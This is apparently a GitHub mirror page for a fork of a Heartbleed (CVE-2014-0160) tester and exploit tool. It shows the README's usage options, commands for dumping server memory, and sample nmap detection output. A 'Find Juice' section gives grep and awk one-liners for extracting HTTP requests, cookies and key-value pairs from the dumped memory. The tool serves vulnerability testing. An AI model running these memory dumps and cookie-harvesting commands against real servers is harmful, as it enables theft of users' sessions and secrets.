nanyomy / heartbleed-poc Goto Github PK
View Code? Open in Web Editor NEWThis project forked from sensepost/heartbleed-poc
This project forked from sensepost/heartbleed-poc
HeartBleed Tester & Exploit --------------------------- Usage: heartbleed-poc.py server [options] Test for SSL heartbeat vulnerability (CVE-2014-0160) Options: -h, --help show this help message and exit -p PORT, --port=PORT TCP port to test (default: 443) -n NUM, --num=NUM Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1) -f FILE, --file=FILE Filename to write dumped memory too (default: dump.bin) -q, --quiet Do not display the memory dump -s, --starttls Check STARTTLS (smtp only right now) Examples -------- * Normal scan, will hit port 443, with 1 iteration: python heartbleed-poc.py example.com * Dump memory scan, will make 100 request and put the output in the binary file dump.bin: python heartbleed-poc.py -n100 -f dump.bin example.com The make sure you get different parts of the HEAP, make sure the server is busy, or you end up with repeat repeat. * Check a mail server with STARTTLS (i.e. port 25): python heartbleed-poc.py -s -p 25 example.com * There used to be a -v switch to make the TLS version explicit, this is auto-detected now and has been removed Find Juice ---------- The binary file will have juicy output in it, here are some simple ways of finding the goods: * HTTP request: awk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin * Cookies: grep -a "^Cookie:" dump.bin * Interesting Key Value Pairs: pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump.bin NMAP NSE Script --------------- Usage: nmap --script=ssl-heartbleed -p 443 <server> Example Output: Starting Nmap 6.41SVN ( http://nmap.org ) at 2014-04-09 17:27 SAST Nmap scan report for <example.org> (1.2.3.4) Host is up (0.0068s latency). PORT STATE SERVICE 443/tcp open https | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | Description: | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 | http://www.openssl.org/news/secadv_20140407.txt |_ http://cvedetails.com/cve/2014-0160/ Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.